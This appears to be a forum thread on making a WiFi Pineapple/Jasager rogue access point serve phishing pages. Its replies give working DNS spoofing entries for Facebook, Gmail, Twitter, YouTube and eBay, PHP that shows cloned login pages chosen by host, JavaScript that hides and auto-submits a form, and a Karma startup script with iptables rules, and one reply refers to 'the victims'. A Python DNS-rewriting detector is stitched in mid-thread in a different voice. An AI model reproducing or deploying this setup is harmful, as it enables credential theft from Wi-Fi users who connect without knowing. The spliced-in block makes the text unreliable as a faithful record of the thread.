How Should I Be Redirecting Using Php?


Hello,

I am having the same php problems as a few other forum users so I wanted to provide a detailed analysis of the problem. Hopefully someone more knowledgeable can help.

I installed php using opkg and tested that a php file loads in Firefox which it does. I added *.php:/usr/bin/php to httpd.conf (on the Fon) and added cgi.force_redirect=0 to php.ini (the = sign is not in the instructions at http://hak5.org/hack/pineapple-phishing but is necessary otherwise the browser tries to download the php file rather than executing it).

I create dnsmasq.conf and edit it to show /#/192.168.1.1

Here is what should happen:

Client enters any URL ---> dnsmasq forwards them to 192.168.1.1 ---> the index.html file in /www issues a redirection to /www/redirect.php (code below) ---> the template for the specific redirected sites should load.

Redirect.php is:

<?php

$ref = $_SERVER['HTTP_HOST'];

if (strpos($ref, "facebook")) { header('Location: facebook.html'); }

require('peets.html');

?>

AIUI the server URL reference is checked by strpos. If the word "facebook" is in the URL then the user is forwarded to facebook.html; otherwise the user is forwarded to peets.html.

The problem is that all websites forward to peets.html including facebook.com.

My edited HTTP headers show:

http://www.facebook.com/

GET / HTTP/1.1

Host: www.facebook.com

HTTP/1.0 200 OK

----------------------------------------------------------

http://www.facebook.com/redirect.php

GET /redirect.php HTTP/1.1

Host: www.facebook.com

HTTP/1.0 200 OK

X-Powered-By: PHP/4.4.7

Content-Type: text/html

----------------------------------------------------------

http://www.facebook.com/peets_files/lhm.css

GET /peets_files/lhm.css HTTP/1.1

Host: www.facebook.com

Referer: http://www.facebook.com/redirect.php

www.facebook.com/redirect.php should redirect to facebook.html but, as we can see, it redirects to peets.html.

Why? Thanks for the help!

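From the client side, the redirection set up in the post above (a dnsmasq wildcard answering every name with 192.168.1.1) can be detected before any page is loaded. The check below is an added example, not code from this thread; it also covers per-name overrides that point selected sites at a local address such as 10.1.0.2. The function names, the sample resolvers and the example.* names are assumptions constructed for illustration.

```python
import ipaddress
import secrets
import socket

# Ranges a public site name should never resolve to (RFC 1918, loopback, link-local).
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16")]


def is_local(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in LOCAL_NETS)


def make_probe_names(count=3):
    """Random names under the reserved .invalid TLD; a sane resolver answers NXDOMAIN."""
    return [secrets.token_hex(8) + ".invalid" for _ in range(count)]


def system_resolve(name):
    """Resolve through the OS resolver; an empty list means no answer."""
    try:
        infos = socket.getaddrinfo(name, None)
    except socket.gaierror:
        return []
    return sorted({info[4][0] for info in infos})


def check_resolver(resolve, known_names, probe_names):
    """Return a list of findings; an empty list means nothing suspicious was seen.

    resolve is any callable mapping a name to a list of address strings.
    """
    findings = []

    # 1. Names that cannot exist must not resolve.
    answered = sorted(n for n in probe_names if resolve(n))
    if answered:
        findings.append("nonexistent names resolved: " + ", ".join(answered))

    # 2. Public sites must not resolve to local addresses.
    known = {n: sorted(resolve(n)) for n in known_names}
    local = sorted(n for n, addrs in known.items()
                   if any(is_local(a) for a in addrs))
    if local:
        findings.append("public names answered with a local address: "
                        + ", ".join(local))

    # 3. Unrelated sites must not all share one identical answer.
    answers = {tuple(a) for a in known.values()}
    if len(known) > 1 and len(answers) == 1 and () not in answers:
        findings.append("all unrelated names share one answer: "
                        + ", ".join(answers.pop()))
    return findings


# Constructed sample data so the example runs offline.
KNOWN = ["www.example.com", "www.example.org", "www.example.net"]
PROBES = ["probe-a.invalid", "probe-b.invalid"]
CLEAN_TABLE = {
    "www.example.com": ["192.0.2.10"],
    "www.example.org": ["198.51.100.20"],
    "www.example.net": ["203.0.113.30"],
}


def clean_resolver(name):
    return CLEAN_TABLE.get(name, [])


def wildcard_resolver(name):
    # Behaves like a resolver configured with address=/#/192.168.1.1
    return ["192.168.1.1"]


def override_resolver(name):
    # Behaves like a hosts-file override for one selected name
    return ["10.1.0.2"] if name == "www.example.com" else clean_resolver(name)


if __name__ == "__main__":
    for label, resolver in (("clean", clean_resolver),
                            ("wildcard", wildcard_resolver),
                            ("override", override_resolver)):
        print(label, check_resolver(resolver, KNOWN, PROBES))
```

On a live network, pass `system_resolve` and `make_probe_names()` instead of the sample resolvers; legitimate captive portals trip the same checks, so a finding means the network is rewriting DNS, not who is doing it.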

you need an exit after the header line otherwise the php script keeps running and outputs all the rest of its contents.

Or simply put else require('peets.html'); so it is part of the conditional :)

<?php

$ref = $_SERVER['HTTP_HOST'];

if (strpos($ref, "facebook"))	{ header('Location: facebook.html'); }
else { require('peets.html'); }

?>


I'd still add an exit after the header just for completeness.

I have tried various versions but everything (including facebook.com) redirects to peets.html whereas anything with 'facebook' in the URL should redirect to facebook.html

First I tried Darren's version:

<?php

$ref = $_SERVER['HTTP_REFERER'];

if (strpos($ref, "facebook"))
{
    header('Location: facebook.html');
    exit;
}

require('peets.html');

?>

Then I tried the same version but with HTTP_HOST rather than HTTP_REFERER.

Then I tried using 'exit' as follows for both HTTP_HOST AND HTTP_REFERER.

<?php

$ref = $_SERVER['HTTP_REFERER'];

if (strpos($ref, "facebook"))
{
    header('Location: facebook.html');
    exit;
}

require('peets.html');

?>

Any more suggestions? Thanks!


There's the off chance you might have a "Boolean FALSE" being returned. There are a few ways to counter this, but I recommend using preg_match instead.

Try this:

<?php

$ref = $_SERVER['HTTP_HOST'];

if (preg_match('/facebook/', $ref)) { 
   header('Location: facebook.html'); 
   exit; 
}

require('peets.html');

?>

http://php.net/manual/en/function.strpos.php

Check out the return value on strpos.

This happens because it finds the value 'facebook' within the first position (0).

A good way to counter it would have been doing something like this:

<?php

$ref = $_SERVER['HTTP_HOST'];

if (strpos($ref, 'facebook') !== FALSE) { 
   header('Location: facebook.html'); 
   exit; 
}

require('peets.html');

?>

I'm afraid the preg_match idea provides: Fatal error: Call to undefined function: preg_match() in /www/redirect.php on line 5

And the second code with !== FALSE redirects all traffic to peets.html as before.

I am wondering whether the problem is that because index.html sends all traffic to redirect.php that when facebook.com is entered, the redirect.php script "sees" the index.html rather than the facebook.com and so quite correctly forwards the user to peets.html.

Also: are we sure that HTTP_POST always forwards the referrer for all browsers (I am using Firefox 3.6).

Any other php ideas? Thanks as always!


HTTP_HOST is nothing to do with the referrer, it is the domain name from the URL.

Try this:

<pre>
<?php

$ref = $_SERVER['HTTP_HOST'];

var_dump ($ref);

?>

and tell us what is displayed

I connected to the Fon and typed www.randomsite.com/code.php

As you may have assumed it provided a "NULL" output.


That's wrong, that value should be populated. Are you definitely using $_SERVER and not $SERVER or something like that?

Only other thing to try is:

<?
phpinfo();
?>

and post the output from that.

I am using $_SERVER - I copied and pasted your code.

The new code above just loaded a blank page but <?php phpinfo(); ?> loads the page for php 4.4.7.


I think he meant for you to post the output of that script

Also, I'm not a php expert, but maybe try:

<?php 
$ref = $_SERVER['HTTP_HOST'];
$ref2 = getenv('HTTP_HOST');
var_dump ($ref);
var_dump ($ref2);
?>

I assume you mean the output of php version 4.4.7.


what URL did you use to get that page?

I connected the Fon to eth0 then typed www.anysitewhatsoever.com/test.php where test.php runs the code:

<?php phpinfo(); ?>

test.php is of course in /www.

I can use any site because of the dnsmasq.conf address=/#/192.168.1.1

In http://hak5.org/hack/auto-rickrolling-wifi-pineapple Darren uses <?php phpinfo(); ?> just to check that PHP is installed correctly.

Should I have done something else? Thanks again.


I don't understand what is going on, the domain name should be passed through to a _SERVER variable but doesn't appear to be. Anyone else got any idea why this is failing as I'm out of ideas.


It looks like the "HTTP_HOST" variable isn't set by either this version of php or by the server (or whatever sets it lol)

I threw together a quick rough fix for you though. I say rough because the victims will need to have javascript enabled...

index.html

<html>
<head>
</head>
<body>
<form action="index.php" method="POST" name="theform">
<input type="text" name="host" value=""/>
</form>
<script type="text/javascript">
document.theform.host.setAttribute("value",window.location);
document.theform.submit();
</script>
</body>
</html>

index.php (named it index.php because it doesn't redirect, it displays the contents of the phishing pages instead of redirecting to them)

<?php
error_reporting(0);
$ref = $_POST['host'];

if (strpos($ref, "facebook.com"))		{ include('facebook.html'); }
else if (strpos($ref, "twitter.com"))		{ include('twitter.html'); }
else if (strpos($ref, "gmail.com") || 
	  strpos($ref, "mail.google.com"))	{ include('gmail.html'); }
else if (strpos($ref, "yahoo.com"))		{ include('yahoo.html'); }
else if (strpos($ref, "youtube.com"))		{ include('youtube.html'); }
else						{ include('peets.html'); }
?>

I'll look at your code shortly thanks but just a thought:

If HTTP_HOST isn't set might not variables like HTTP_X_FORWARDED_FOR, HTTP_X_FORWARDED_HOST, and HTTP_X_FORWARDED_SERVER work instead?

Or, maybe download a PHP version which does use the HTTP_HOST variable?

Thanks - that worked a treat. Much appreciated! And thanks also to Robin for all your help.

This is how I did it.

root@router:/# cat /etc/config/httpd 
config 'httpd'
	option 'port' '1338'
	option 'home' '/www'

config 'httpd'
        option 'port' '80'
        option 'home' '/wwwguest'

root@router:/# cat /etc/hosts
#----------------------------------------
# Local
#----------------------------------------
127.0.0.1 localhost.
10.1.0.2 router jasager
#----------------------------------------
# Gateway and services
#----------------------------------------
10.1.0.1 gateway 
78.24.191.177 downloads.openwrt.org
46.4.11.11 downloads.x-wrt.org
#----------------------------------------
# Phishing
#----------------------------------------
10.1.0.2 www.facebook.com facebook.com
10.1.0.2 www.facebook.dk facebook.dk
10.1.0.2 da-dk.facebook.com
#----------------------------------------
10.1.0.2 www.twitter.com twitter.com
10.1.0.2 www.twitter.dk twitter.dk
#----------------------------------------
10.1.0.2 www.gmail.dk gmail.dk
10.1.0.2 www.gmail.com gmail.com
10.1.0.2 mail.google.com
10.1.0.2 mail.google.dk
#----------------------------------------
#10.1.0.2 plus.google.com plus.google.dk
#----------------------------------------
10.1.0.2 www.youtube.com youtube.com
#----------------------------------------
10.1.0.2 www.ebay.com ebay.com
#----------------------------------------
#10.1.0.2 www.yahoo.com yahoo.com
#----------------------------------------
#10.1.0.2 www.linkedin.com linkedin.com
#----------------------------------------

root@router:/# cat /etc/php.ini |egrep www|cgi.force_redirect
doc_root = /wwwguest
cgi.force_redirect = 0

root@router:/# cat /wwwguest/index.html 
<html><head></head><body>
<div id="hideme">
 <form action="index.php" method="POST" name="theform">
  <input type="text" name="host" style="width:0px;" value="" type="hidden"/>
 </form>
</div>

<script type="text/javascript">
document.getElementById('hideme').style.display='none';

function left(str,n){
if (n <= 0)
 return "";
else if (n > String(str).length)
 return str;
else
 return String(str).substring(0,n);
}

function right(str,n){
if (n <= 0)
 return "";
else if (n > String(str).length)
 return str;
else {
 var iLen = String(str).length;
 return String(str).substring(iLen,iLen-n);
 }
}

var the_url = window.location.href;
var the_url_len = the_url.length-7;
the_url = right(the_url,the_url_len)

var where_is_slash=the_url.indexOf('/');
the_url = left(the_url,where_is_slash);

document.theform.host.setAttribute("value","http://"+the_url);
document.theform.submit(); 
</script>
</body>
</html>

root@router:/# cat /wwwguest/index.php
<?php

error_reporting(0);
$ref = strtolower ( $_POST['host'] );

//$header = str_replace("http://", "https://", $ref);
//header ("Location: $header/index.php");

if ("$ref" != "") {
 if (strpos($ref,"facebook.com")||strpos($ref,"www.facebook.com")||strpos($ref,"facebook.dk")||strpos($ref,"www.facebook.com.")){include('facebook.html');}
 else if (strpos($ref,"gmail.com")||strpos($ref,"www.gmail.com")||strpos($ref,"gmail.dk")||strpos($ref,"www.gmail.dk")||strpos($ref,"mail.google")){include('gmail.html');}
 else if (strpos($ref,"twitter.com")||strpos($ref,"www.twitter.com")){include('twitter.html');} 
 else if (strpos($ref,"youtube.com")||strpos($ref,"www.youtube.com")){include('youtube.html');}
 else if (strpos($ref,"ebay.com")||strpos($ref,"www.ebay.com")){include('ebay.html');}
 else {include('peets.html');}
} 
else {
echo '<html><head>';
echo "<meta http-equiv=\"REFRESH\" content=\"0;url=/index.html\">";
echo '</head><body></body></html>';
}
?>

root@router:/etc/init.d# cat /etc/init.d/jasager 
#!/bin/sh /etc/rc.common
# Copyright (C) 2008 dninja@gmail.com
START=50

start() {
	include /lib/network
	scan_interfaces
	/karma/bin/create_option_list.rb
	[ -d /karma/www -a -f /karma/etc/httpd.conf ] && httpd -p 1337 -h /karma/www -r karma -c /karma/etc/httpd.conf
# ORIGINAL	iptables -I FORWARD -i ath0 -o br-lan -j ACCEPT
        #-------------------------------------------------------------------------------
        # PREPARE KARMA
        #-------------------------------------------------------------------------------
         iwpriv ath0 maccmd 3;                              sleep 1 # Clear the MAC ignore list
         iwpriv ath0 maccmd 2;                              sleep 1 # To make the list a blacklist. 
         # iwpriv ath0 maccmd 1;                            sleep 1 # To make the list a whitelist.
         iwpriv ath0 addmac 00:12:34:13:37:12;              sleep 1 # Ignore backtrack wifi interface
         # iwpriv ath0 addkarmassid "Free Internet";        sleep 1 # Ignore my wifi does not work :(
         iwpriv ath0 karma 1;                               sleep 1 # Start karma
         ifconfig ath0 up;                                  sleep 1 # Activate ath0 interface
         #-------------------------------------------------------------------------------
         # IPTABLES VARIABLES
         #-------------------------------------------------------------------------------
         IPT='/usr/sbin/iptables' 
         GATEWAY="10.1.0.1"                             # To the internet ( my thinkpad )
         JASAGER="10.1.0.2"                             # To the targets
         #-------------------------------------------------------------------------------
         # REMOVE ALL IPTABLES RULES
         #-------------------------------------------------------------------------------
         # reset the default policies in the filter table.
         $IPT -P INPUT ACCEPT
         $IPT -P FORWARD ACCEPT
         $IPT -P OUTPUT ACCEPT
         # reset the default policies in the nat table.
         $IPT -t nat -P PREROUTING ACCEPT
         $IPT -t nat -P POSTROUTING ACCEPT
         $IPT -t nat -P OUTPUT ACCEPT
         # reset the default policies in the mangle table.
         $IPT -t mangle -P PREROUTING ACCEPT
         $IPT -t mangle -P POSTROUTING ACCEPT
         $IPT -t mangle -P INPUT ACCEPT
         $IPT -t mangle -P OUTPUT ACCEPT
         $IPT -t mangle -P FORWARD ACCEPT
         # flush all the rules in the filter and nat tables.
         $IPT -F
         $IPT -t nat -F
         $IPT -t mangle -F
         # erase all chains that's not default in filter and nat table.
         $IPT -X
         $IPT -t nat -X
         $IPT -t mangle -X
         #-------------------------------------------------------------------------------
         # Allow localhost
         #-------------------------------------------------------------------------------
         $IPT -A INPUT -s 127.0.0.0/8 -i lo -j ACCEPT
         $IPT -A OUTPUT -s 127.0.0.0/8 -o lo -j ACCEPT
         #-------------------------------------------------------------------------------
         # Allow DNS
         #-------------------------------------------------------------------------------
         $IPT -A INPUT -i br-lan -d ${JASAGER} -m udp -p udp --dport 53 -j ACCEPT
         $IPT -A INPUT -i br-lan -d ${JASAGER} -m tcp -p tcp --dport 53 -j ACCEPT
         #-------------------------------------------------------------------------------
         # BLOCK STUFF
         #-------------------------------------------------------------------------------
         $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --syn -j DROP                     # Block SYN
         $IPT -A INPUT -i eth0 -d ${JASAGER} -f -j DROP                               # Block Fragments
         # Block NMAP Scans:
         $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags ALL FIN,URG,PSH -j DROP          #
         $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags ALL ALL -j DROP                  #
         $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags ALL NONE -j DROP                 # NULL
         $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags SYN,RST SYN,RST -j DROP          #
         $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP          # XMAS
         $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags FIN,ACK FIN -j DROP              # FIN
         $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j DROP  #
         $IPT -A INPUT -d ${JASAGER} -m state --state NEW -m tcp -p tcp --dport 80 -j ACCEPT # OK for http requests
         #-------------------------------------------------------------------------------
         # iptables -A INPUT -m limit --limit 15/minute -j LOG --log-level 7 --log-prefix "Dropped by firewall:"
         $IPT -A INPUT -s ! ${GATEWAY} -d ${JASAGER} -m state --state NEW -j DROP   # NEW only from Gateway
         #-------------------------------------------------------------------------------
         /usr/sbin/iwconfig ath0 txpower 18
         #-------------------------------------------------------------------------------

	logread -f | awk '{if ($0 ~ /(KARMA: |DHCPACK|DHCPDISCOVER|DHCPOFFER|DHCPREQUEST)/) {sub (/ \(.*\).*: /, ": ", $0); print $0 ;}} ' > /tmp/status.log &
	tail -f /tmp/status.log | /karma/bin/logwatch &
}

stop() {
	killall httpd
}

That worked perfectly, great work. My only change was to avoid the textbox containing the URL from being displayed by adding:

document.theform.host.style.visibility='hidden';

<html>
<head>
</head>
<body>
<form action="index.php" method="POST" name="theform">
<input type="text" name="host" value=""/>
</form>
<script type="text/javascript">
document.theform.host.style.visibility='hidden';
document.theform.host.setAttribute("value",window.location);
document.theform.submit();
</script>
</body>
</html>
